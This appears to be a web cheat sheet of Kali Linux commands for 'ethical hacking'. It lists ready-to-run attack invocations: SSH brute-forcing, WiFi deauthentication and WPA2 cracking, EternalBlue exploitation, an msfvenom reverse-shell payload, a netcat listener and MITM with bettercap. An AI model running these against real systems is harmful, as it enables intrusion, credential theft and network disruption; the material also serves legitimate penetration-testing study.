Kali Linux Commands for Ethical Hacking Tools

 


Here's a complete list of Kali Linux tools and their commands, categorized by Reconnaissance, Scanning, Exploitation, Wireless Attacks, Password Cracking, and Post-Exploitation.


🕵️ 1. Reconnaissance (Information Gathering)

WHOIS Lookup

sh
whois example.com

Get domain information.

DNS Enumeration

sh
dig example.com
nslookup example.com
host example.com

Find subdomains & DNS records.

Subdomain Discovery

sh
sublist3r -d example.com

List subdomains of a target.

Network Scanning (Nmap)

sh
nmap -sS -p 1-65535 example.com
nmap -A -T4 example.com

Scan open ports & services.

Netcat (Banner Grabbing & Reverse Shell)

sh
nc -v example.com 80
nc -lvnp 4444

🌐 2. Web Application Security

Nikto (Web Vulnerability Scanner)

sh
nikto -h http://example.com

Scan for vulnerabilities.

SQL Injection (SQLmap)

sh
sqlmap -u "http://example.com/page.php?id=1" --dbs

Test for SQL Injection.

XSS Scanner

sh
xsstrike -u "http://example.com/search?q=test"

Detect Cross-Site Scripting (XSS).

Directory Bruteforce (Gobuster)

sh
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

Find hidden directories.


🔍 3. Network Scanning & Enumeration

Nmap Advanced Scanning

sh
nmap -sV -O example.com

Detect OS & services.

Fping (Find Live Hosts)

sh
fping -g 192.168.1.0/24

Check active devices.

Netdiscover (ARP Scan for Local Network)

sh
netdiscover -r 192.168.1.0/24

List all connected devices.


🔓 4. Password Cracking

Hashcat (Password Cracking)

sh
hashcat -m 0 -a 0 hash.txt rockyou.txt

Brute-force an MD5 hash.

John the Ripper

sh
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Crack password hashes.

Hydra (Brute Force Login)

sh
hydra -l admin -P rockyou.txt example.com ssh

Brute-force SSH login.


📡 5. Wireless Hacking

Monitor WiFi Traffic (Airodump-ng)

sh
airmon-ng start wlan0
airodump-ng wlan0mon

Start WiFi monitoring.

Deauthenticate WiFi Clients

sh
aireplay-ng --deauth 100 -a <Router_BSSID> wlan0mon

Disconnect devices from WiFi.

Crack WPA2 WiFi Password

sh
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture.cap

Crack WPA2 password.


💀 6. Exploitation (Metasploit)

Start Metasploit

sh
msfconsole

Launch Metasploit.

Find Exploits

sh
search exploit smb

Search for vulnerabilities.

Exploit Windows SMB (EternalBlue)

sh
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
exploit

Create Payload

sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

Generate a Windows reverse shell payload.


📶 7. MITM Attacks & Sniffing

Bettercap (MITM Attack)

sh
bettercap -iface eth0
net.probe on

Perform MITM attacks.

Packet Sniffing (Wireshark)

sh
tshark -i eth0

Monitor live network traffic.


🛡️ 8. Anonymity & Privacy

Tor & Proxychains

sh
tor
proxychains firefox

Browse anonymously.

Change MAC Address

sh
macchanger -r eth0

Randomize MAC address.


🎯 Bonus: Forensics & Reverse Engineering

ExifTool (Metadata Extraction)

sh
exiftool image.jpg

Extract metadata from images.

Binwalk (Extract Hidden Data from Files)

sh
binwalk -e firmware.bin

Analyze firmware files.

Steghide (Steganography)

sh
steghide extract -sf hidden.jpg

Extract hidden data from an image.
